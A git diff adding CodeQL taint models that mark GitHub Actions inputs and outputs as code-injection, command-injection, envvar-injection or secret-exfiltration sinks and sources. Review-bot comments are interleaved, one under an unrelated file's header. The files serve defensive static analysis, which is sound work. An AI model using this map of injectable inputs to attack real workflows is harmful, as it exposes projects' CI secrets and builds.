"code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml new file mode 100644 index 000000000000..c1a51cefdcdb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml new file mode 100644 index 000000000000..c9b7394f044d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "input.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml new file mode 100644 index 000000000000..36c50c6ad506 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..fc0607380ffe --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "input.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml new file mode 100644 index 000000000000..122a61c76fbf --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml new file mode 100644 index 000000000000..26ff1b8d07c4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml b/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml new file mode 100644 index 000000000000..62ffad944930 --- /dev/null +++ b/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
new file mode 100644
index 000000000000..d09b5bf0085e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml
new file mode 100644
index 000000000000..45a4441e5ca9
--- /dev/null
+++ b/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"]
+ - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_json", "taint", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
new file mode 100644
index 000000000000..2f38a2588679
--- /dev/null
+++ b/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
new file mode 100644
index 000000000000..ba894b157329
--- /dev/null
+++ b/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
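Review bot: The MeilCli_regex-match.model.yml and SonarSource_sonarcloud-github-action.model.yml hunks each end with an empty added line after the last `data` row, which the neighbouring manual models (AsasInnab_regex-action, Steph0_dotenv-configserver) do not have. The same trailing empty line(s) appear in the WyriHaximus and ab185508 hunks, the akefirad hunk, the alessbell hunk and the ankitjain28may hunk further down. Dropping them keeps the hand-written model files uniform and avoids whitespace-only churn the next time they are regenerated or reformatted.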
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
new file mode 100644
index 000000000000..a29b008f6c2c
--- /dev/null
+++ b/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/WyriHaximus/github-action-files-in-commit
+ - ["WyriHaximus/github-action-files-in-commit", "*", "output.files", "filename", "manual"]
+
+
diff --git a/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
new file mode 100644
index 000000000000..045e1177ae20
--- /dev/null
+++ b/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
new file mode 100644
index 000000000000..011f078ff688
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/ab185508/file-type-finder
+ - ["ab185508/file-type-finder", "*", "output.paths", "filename", "manual"]
+ - ["ab185508/file-type-finder", "*", "output.names", "filename", "manual"]
+ - ["ab185508/file-type-finder", "*", "output.extaddpaths", "filename", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
new file mode 100644
index 000000000000..ea86e6f5ec7a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/actions_github-script.model.yml b/actions/ql/lib/ext/manual/actions_github-script.model.yml
new file mode 100644
index 000000000000..3033719bc3b5
--- /dev/null
+++ b/actions/ql/lib/ext/manual/actions_github-script.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["actions/github-script", "*", "input.script", "code-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
new file mode 100644
index 000000000000..f245519a061c
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"]
+ - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"]
diff --git a/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
new file mode 100644
index 000000000000..0116f070183f
--- /dev/null
+++ b/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
new file mode 100644
index 000000000000..c272955c58ef
--- /dev/null
+++ b/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
@@ -0,0 +1,21 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection", "manual"]
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
new file mode 100644
index 000000000000..5523b7c50675
--- /dev/null
+++ b/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
new file mode 100644
index 000000000000..8d49c5436e62
--- /dev/null
+++ b/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"]
diff --git a/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml b/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml
new file mode 100644
index 000000000000..d607aee0514a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"]
+ - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"]
+ - ["anchore/sbom-action", "*", "input.path", "command-injection", "manual"]
+ - ["anchore/sbom-action", "*", "input.file", "command-injection", "manual"]
+ - ["anchore/sbom-action", "*", "input.image", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/anchore_scan-action.model.yml b/actions/ql/lib/ext/manual/anchore_scan-action.model.yml
new file mode 100644
index 000000000000..93bfef222696
--- /dev/null
+++ b/actions/ql/lib/ext/manual/anchore_scan-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
new file mode 100644
index 000000000000..84500597ce23
--- /dev/null
+++ b/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"]
+ - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"]
+ - ["andresz1/size-limit-action", "*", "input.script", "command-injection", "manual"]
+ - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml b/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml
new file mode 100644
index 000000000000..3db7aa5db2cd
--- /dev/null
+++ b/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
new file mode 100644
index 000000000000..ac01c86d5874
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/ankitjain28may/list-files-in-pr
+ - ["ankitjain28may/list-files-in-pr", "*", "output.pullRequestFiles", "filename", "manual"]
+
+
diff --git a/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
new file mode 100644
index 000000000000..47411f7342ad
--- /dev/null
+++ b/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml
new file mode 100644
index 000000000000..087045d86b4a
--- /dev/null
+++ b/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"]
+ - ["appleboy/ssh-action", "*", "input.envs", "envvar-injection", "manual"]
+
diff --git a/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml b/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml
new file mode 100644
index 000000000000..29276b6fdd48
--- /dev/null
+++ b/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"]
\ No newline at end of file
diff --git a/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
new file mode 100644
index 000000000000..db6c52b33fd2
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
new file mode 100644
index 000000000000..d20d698c40d6
--- /dev/null
+++ b/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"]
+ - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
new file mode 100644
index 000000000000..f0e4e6e31b19
--- /dev/null
+++ b/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"]
+ - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"]
+ - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
new file mode 100644
index 000000000000..b15eff553369
--- /dev/null
+++ b/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
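Review bot: The two `input.replace-with` rows in aszc_change-string-case-action.model.yml look copied from a replace-string model rather than derived from this action's interface: `input.string` is modeled as reaching only `output.capitalized`, while `output.uppercase` and `output.lowercase` are attributed to a `replace-with` input that a case-conversion action presumably does not declare. If that input does not exist, those two rows never match a real step and taint on the `uppercase`/`lowercase` outputs is silently lost. After checking the action's `action.yml`, I would change them to `- ["aszc/change-string-case-action", "*", "input.string", "output.uppercase", "taint", "manual"]` and `- ["aszc/change-string-case-action", "*", "input.string", "output.lowercase", "taint", "manual"]`.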
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/AvraamMavridis/files-changed-action
+ - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES", "filename", "manual"]
+ - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES_EXTENSIONS", "filename", "manual"]
+
+
diff --git a/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
new file mode 100644
index 000000000000..f17f3c788b3b
--- /dev/null
+++ b/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml b/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
new file mode 100644
index 000000000000..ccdb64fd3f32
--- /dev/null
+++ b/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"]
+ - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/azure_cli.model.yml b/actions/ql/lib/ext/manual/azure_cli.model.yml
new file mode 100644
index 000000000000..588c17bc76a4
--- /dev/null
+++ b/actions/ql/lib/ext/manual/azure_cli.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"]
+ - ["azure/cli", "*", "input.azcliversion", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/azure_powershell.model.yml b/actions/ql/lib/ext/manual/azure_powershell.model.yml
new file mode 100644
index 000000000000..901c4cf461e0
--- /dev/null
+++ b/actions/ql/lib/ext/manual/azure_powershell.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"]
+ - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml
new file mode 100644
index 000000000000..8db78b6e9a8b
--- /dev/null
+++ b/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
new file mode 100644
index 000000000000..20a06102bbdb
--- /dev/null
+++ b/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml
new file mode 100644
index 000000000000..043610ab3a36
--- /dev/null
+++ b/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"]
diff --git a/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
new file mode 100644
index 000000000000..037b67993f3e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"]
+ - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
new file mode 100644
index 000000000000..7483849b916e
--- /dev/null
+++ b/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
new file mode 100644
index 000000000000..8f5a15aa1e92
--- /dev/null
+++ b/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"]
+ - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
new file mode 100644
index 000000000000..f18fd14a4a61
--- /dev/null
+++ b/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml b/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml
new file mode 100644
index 000000000000..f3eabe2c17d7
--- /dev/null
+++ b/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"]
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"]
+ - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"]
\ No newline at end of file
